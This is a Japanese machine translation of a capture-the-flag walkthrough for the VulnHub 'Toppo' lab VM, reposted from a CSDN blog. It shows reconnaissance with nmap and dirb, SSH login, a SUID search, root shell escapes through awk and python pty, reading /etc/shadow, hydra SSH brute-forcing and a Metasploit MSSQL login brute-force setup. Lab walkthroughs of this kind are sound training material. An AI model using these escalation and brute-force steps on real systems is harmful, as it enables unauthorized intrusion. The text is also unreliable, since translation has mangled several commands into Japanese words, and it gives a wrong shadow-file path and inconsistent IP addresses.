トッポ ターゲット ドローンの侵入

仮想マシンイメージのダウンロードアドレス

1、https://download.vulnhub.com/toppo/Toppo.zip
2、https://download.vulnhub.com/toppo/Toppo.zip.torrent

VMware による新しい仮想マシンの作成 - 仮想マシンの構成 - ミラーの構成後に開きます

インストール後

仮想マシンのネットワーク編集の構成 - nat モード - kali のネットワーク セグメントを使用してターゲット マシンを構成します。e684b25e1828f67e4d90cfd1c816527f.png

情報収集:

1. ターゲットマシンのIPアドレスを検索します。

arp-scan -l0d09f5f2666c38b68e4aae1127c60359.png

2.Namp はホスト上で開いているすべてのポートをスキャンします

nmap -T4 -A -v 192.168.245.247

3. ブラウザのテスト アクセス ポート 809afcbfe6e9e5bd8c4af0200ca1d2f3a3.png

知識の補足:

ポート 111: Sun Company の RPC サービスのすべてのポート? ?

ポート 80: HTTP ポート 8080 はポート 80 と同じです

ポート22: Sshリモート接続サーバーポート

3. ポート 80 に従って Web クローリングとスキャンを実行します。

kaliLinux システム dirb ツールの使用

ディルブhttp://192.168.245.247

 

4. ディレクトリをスキャンして管理ページを見つけ、http: //192.168.245.247 /adminにアクセスします。

このページには、notes.txt ファイルもあります。77794177b1b3de2cdfcd865014edc229.png

 5. 開いているポート 22 を介してリモートでログインします。

ssh 192.168.245.247 -lテッド

6. リモートログイン後に権限を昇格できます

find / -perm -u=s -type f 2>/dev/null

/etc/sudoers で

パスワードを必要としない awk を発見する

7. Python コマンドを使用して権限を昇格しますか? ?

1\mawk 'BEGIN {system("/bin/sh")}'

2\python2.7 -c 'import pty;pty.spawn("/bin/sh")'

 

旗を手に入れる

知識ポイント:

サーバーに入った後

カーネル スタック オーバーフローを使用して権限を昇格する

メッセージを収集します:

Linux パスワード ファイルのパスは etc/bin/shadow です。

現在のシステムのカーネル バージョン

うなめ -a

リリースバージョンを表示

猫/etc/問題

cat /etc/*-release

シャドウファイルを表示する

詳細 /etc/shadow

パスワードファイルを表示する

さらにパスワード

ヒドラ ブルート フォース クラック ルート アカウント

Windows下ダウンロード:GitHub - maaaaz/thc-hydra-windows: Windows用にコンパイルされた素晴らしいTHC-HYDRAツール

hydra -l root -PC:\Users\Monster\Desktop\network security\弱いパスワードの爆破\サーバーのパスワード.txt -t 6 ssh://192.168.245.247

ログインアカウント root、パスワード test123

msf を使用してポート 1433: 192.168.10.251 をブラストします。

(1)auxiliary/scanner/mssql/mssql_loginを使用する

(2)RHOSTS 192.168.109.139 を設定します

(3)USER_FILE /home/xh/shentou/usr_mysql.txtを設定します

(4)PASS_FILE /home/xh/shentou/pwd_mysql.txtを設定します

(5)走る

 

おすすめ

転載: blog.csdn.net/weixin_56306210/article/details/128288146